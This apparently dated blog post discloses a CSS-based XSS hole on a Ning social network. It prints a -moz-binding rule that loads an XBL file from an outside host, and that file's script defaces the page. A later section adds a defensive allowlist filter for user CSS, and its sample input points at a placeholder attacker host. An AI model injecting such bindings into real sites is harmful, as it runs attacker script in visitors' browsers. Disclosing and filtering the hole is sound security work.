House Of Hacked Hackers.

Published on: 1210156714
Ah well, pun intended. :)



Looks like Ning.com is vulnerable to XSS, and quite a bit at that. I signed up on PDP's new social network called House of Hackers. It seems that Ning lets us edit the stylesheet; obviously they never heard of CSS XSS -moz-binding attacks, otherwise this would not work. These XSS attacks can be launched from a stylesheet, because Firefox's -moz-binding property attaches an XBL binding whose script runs in the context of the page.



http://houseofhackers.ning.com/profile/0x0000000



I just created a new CSS rule that fetches the XBL sheet, which I borrowed from my good friend Gareth, to include it on Ning as an example.





#xg_body {
  -moz-binding:url("http://0x000000.com/xbl.xml#xss");
}





Which modifies the page like so:



<?xml version="1.0"?>
<bindings xmlns="http://www.mozilla.org/xbl"
          xmlns:html="http://www.w3.org/1999/xhtml">
  <binding id="xss">
    <implementation>
      <constructor>
        document.getElementById('xg_sitename').innerHTML = '<h1>HOUSE OF H4x0rs!!!!!</h1>';
      </constructor>
    </implementation>
  </binding>
</bindings>





There are probably more vectors possible, and hence my problem with such sites as a whole.
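
The defensive side of the stylesheet problem above, as an added example that is not part of the original post and not Ning's code: an allowlist filter that parses user CSS and re-serializes only known-safe declarations, so -moz-binding, url(), expression() and at-rules never reach the page. The property allowlist, the value grammar, the function names and the sample input are assumptions made for illustration.

```javascript
// Added example: allowlist filter for user-editable CSS (not Ning's code).
// ALLOWED_PROPS and the value grammar below are assumptions for this demo.
const ALLOWED_PROPS = new Set(["color", "background-color", "font-size",
  "font-weight", "margin", "padding", "border", "text-align"]);
const SAFE_SELECTOR = /^[\w\s#.,>:*-]+$/;
// Keywords, numbers, hex colours and rgb()/rgba() only: no url(), no quotes.
const SAFE_VALUE = /^(?:[\w#%.,!\s-]|rgba?\([\d\s.,%]+\))+$/;

// Resolve CSS escapes (\69, \000069, \i) so an obfuscated name cannot hide.
function decodeEscapes(s) {
  return s.replace(/\\([0-9a-f]{1,6})\s?|\\([^\n])/gi, (m, hex, ch) => {
    if (!hex) return ch;
    const cp = parseInt(hex, 16);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : "\ufffd";
  });
}

// Parse flat "selector { declarations }" rules and re-serialize only what
// passes the allowlist; anything unparsed never reaches the output.
function filterUserCss(css) {
  const kept = [], rejected = [];
  const text = decodeEscapes(css.replace(/\/\*[\s\S]*?\*\//g, ""));
  for (const [, sel, body] of text.matchAll(/([^{}]+)\{([^{}]*)\}/g)) {
    const selector = sel.trim();
    // At-rules (@import ...) fail this test and take the rule with them.
    if (!SAFE_SELECTOR.test(selector)) { rejected.push(selector); continue; }
    const decls = [];
    for (const decl of body.split(";")) {
      if (!decl.trim()) continue;
      const i = decl.indexOf(":");
      const prop = (i < 0 ? decl : decl.slice(0, i)).trim().toLowerCase();
      const value = i < 0 ? "" : decl.slice(i + 1).trim();
      if (ALLOWED_PROPS.has(prop) && SAFE_VALUE.test(value)) {
        decls.push(`${prop}: ${value}`);
      } else rejected.push(prop);
    }
    if (decls.length) kept.push(`${selector} { ${decls.join("; ")} }`);
  }
  return { css: kept.join("\n"), rejected };
}

// Constructed input: the post's rule with an escaped property name and a
// placeholder host, plus one harmless declaration.
const SAMPLE = '#xg_body { -moz-b\\69nding: url("http://attacker.example/' +
  'xbl.xml#xss"); color: #fff }';
console.log(filterUserCss(SAMPLE));
```

The filter fails closed: a rule that follows an at-rule without its own line of clean input is dropped along with it, which is the safer trade-off for untrusted stylesheets.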